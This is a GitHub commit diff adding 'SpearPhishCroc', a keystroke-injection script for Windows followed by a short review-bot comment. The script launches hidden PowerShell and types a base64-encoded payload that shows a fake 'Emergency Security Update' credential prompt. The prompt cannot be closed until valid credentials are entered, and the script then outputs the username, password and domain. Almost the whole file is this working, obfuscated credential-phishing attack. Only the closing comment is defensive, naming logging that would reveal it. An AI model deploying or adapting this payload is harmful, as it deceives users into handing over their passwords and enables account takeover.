Created SpearPhishCroc

Opens a popup demanding user credentials; the popup can't be closed until valid credentials are entered.
Idea and code based on the famous Invoke-CredentialsPhish.
pull/33/head
0iphor13 2022-01-23 15:22:47 +01:00 committed by GitHub
parent e4818a2c4b
commit 0f9af57fad
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 77 additions and 0 deletions


@ -0,0 +1,77 @@
#######################################################SpearPhishCroc############################################################
# Version 1.0
# OS: Windows
# Author: 0iphor13
# Idea and code based on Invoke-CredentialsPhish from Nikhil Mittal
################Trigger a popup, demanding for valid credentials, popup can't be closed without valid credentials################
MATCH phishy
export DUCKY_LANG=de
C2NOTIFY INFO 'SpearPhish attack started!'
########################################Opening Powershell hidden - Executing base64 encoded payload#############################
DELAY 1500
Q GUI r
Q DELAY 500
Q STRING powershell -NoP -NonI -w hidden
Q DELAY 250
Q ENTER
DELAY 200
Q STRING "powershell.exe -enc WwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAA0ACgBQAGEAcgBhAG0AIAAoACkADQAKAA0ACgAgACAAIAAgACQARQBy"
Q DELAY 100
Q STRING "AHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgANAAoAIAAgACAAIABB"
Q DELAY 100
Q STRING "AGQAZAAtAFQAeQBwAGUAIAAtAGEAcwBzAGUAbQBiAGwAeQBuAGEAbQBlACAAcwB5AHMAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlA"
Q DELAY 100
Q STRING "HMALgBhAGMAYwBvAHUAbgB0AG0AYQBuAGEAZwBlAG0AZQBuAHQAIAANAAoAIAAgACAAIAAkAEQAUwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH"
Q DELAY 100
Q STRING "MAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlAHMALgBBAGMAYwBvAHUAbgB0AE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAHIAaQBuAGM"
Q DELAY 100
Q STRING "AaQBwAGEAbABDAG8AbgB0AGUAeAB0ACgAWwBTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQByAHYAaQBjAGUAcwAuAEEAYwBjAG8AdQBuAHQA"
Q DELAY 100
Q STRING "TQBhAG4AYQBnAGUAbQBlAG4AdAAuAEMAbwBuAHQAZQB4AHQAVAB5AHAAZQBdADoAOgBNAGEAYwBoAGkAbgBlACkADQAKACAAIAAgACAAJABkAG8AbQBhAGkAb"
Q DELAY 100
Q STRING "gBEAE4AIAA9ACAAIgBMAEQAQQBQADoALwAvACIAIAArACAAKABbAEEARABTAEkAXQAiACIAKQAuAGQAaQBzAHQAaQBuAGcAdQBpAHMAaABlAGQATgBhAG0AZQ"
Q DELAY 100
Q STRING "ANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABjAHIAZQBkAGUAbgB0AGkAYQB"
Q DELAY 100
Q STRING "sACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAFAAcgBvAG0AcAB0AEYAbwByAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAiAEUAbQBlAHIAZwBlAG4AYwB5ACAAUwBlA"
Q DELAY 100
Q STRING "GMAdQByAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAsACAAIgBQAGwAZQBhAHMAZQAgAGUAbgB0AGUAcgAgAHkAbwB1AHIAIAB1AHMAZQByAG4AYQBtAGUAIABhAG4"
Q DELAY 100
Q STRING "AZAAgAHAAYQBzAHMAdwBvAHIAZAAuACIALAAgACIAIgAsACAAIgAiACkADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAcgBlAGQAZQBuAHQAaQBhAGwAK"
Q DELAY 100
Q STRING "QANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwByAGUAZABzACAAPQAgACQAYwByAGUAZABlAG4AdABpAGEAbAAu"
Q DELAY 100
Q STRING "AEcAZQB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbAAoACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHU"
Q DELAY 100
Q STRING "AcwBlAHIAIAA9ACAAJABjAHIAZQBkAHMALgB1AHMAZQByAG4AYQBtAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHAAYQ"
Q DELAY 100
Q STRING "BzAHMAIAA9ACAAJABjAHIAZQBkAHMALgBwAGEAcwBzAHcAbwByAGQADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAGQAbwBtA"
Q DELAY 100
Q STRING "GEAaQBuACAAPQAgACQAYwByAGUAZABzAC4AZABvAG0AYQBpAG4ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQB1AHQAaABsAG8AYwBhAGwAIAA9ACAAJ"
Q DELAY 100
Q STRING "ABEAFMALgBWAGEAbABpAGQAYQB0AGUAQwByAGUAZABlAG4AdABpAGEAbABzACgAJAB1AHMAZQByACwAIAAkAHAAYQBzAHMAKQANAAoAIAAgACAAIAAgACAAIAAgA"
Q DELAY 100
Q STRING "CAAIAAgACAAJABhAHUAdABoAGQAbwBtAGEAaQBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQB"
Q DELAY 100
Q STRING "yAHYAaQBjAGUAcwAuAEQAaQByAGUAYwB0AG8AcgB5AEUAbgB0AHIAeQAoACQAZABvAG0AYQBpAG4ARABOACwAJAB1AHMAZQByACwAJABwAGEAcwBzACkADQAKACAA"
Q DELAY 100
Q STRING "IAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAJABhAHUAdABoAGwAbwBjAGEAbAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAAtAG8AcgAgACgAJABhAHUAdABoA"
Q DELAY 100
Q STRING "GQAbwBtAGEAaQBuAC4AbgBhAG0AZQAgAC0AbgBlACAAJABuAHUAbABsACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIA"
Q DELAY 100
Q STRING "AgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0ACAAPQAgACIAVQBzAGUAcgBuAGEAbQBlADoAIAAiACAAKwAgACQAdQBzAGUAcgAgACsAIAAiACAAUABhAHMA"
Q DELAY 100
Q STRING "cwB3AG8AcgBkADoAIAAiACAAKwAgACQAcABhAHMAcwAgACsAIAAiACAARABvAG0AYQBpAG4AOgAiACAAKwAgACQAZABvAG0AYQBpAG4AIAArACAAIgAgAEQAbwBtAG"
Q DELAY 100
Q STRING "EAaQBuADoAIgArACAAJABhAHUAdABoAGQAbwBtAGEAaQBuAC4AbgBhAG0AZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0A"
Q DELAY 100
Q STRING "A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAg"
Q DELAY 100
Q STRING "AH0ADQAKACAAIAAgACAAfQA="
Q DELAY 100
Q ENTER
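Review bot: The header comments describe the behaviour in one line, while the actual logic sits in the base64 `-enc` argument typed across the `Q STRING` lines, so what runs on the host cannot be reviewed from this diff. I would add a header comment that points at the readable source, e.g. `# -enc argument: UTF-16LE base64 of the PowerShell prompt loop; readable source: <path-to-decoded-script>`, and keep that source in the repository next to the payload. For readers on the defensive side, the visible lines give the observable chain: a Run-dialog launch of `powershell -NoP -NonI -w hidden`, then what is presumably a child `powershell.exe -enc` typed into that window. Process command-line auditing and PowerShell script block logging (event 4104) both record this, the latter with the decoded script. The hunk header announces 77 lines and fewer are visible here, so part of the file may be missing from this view.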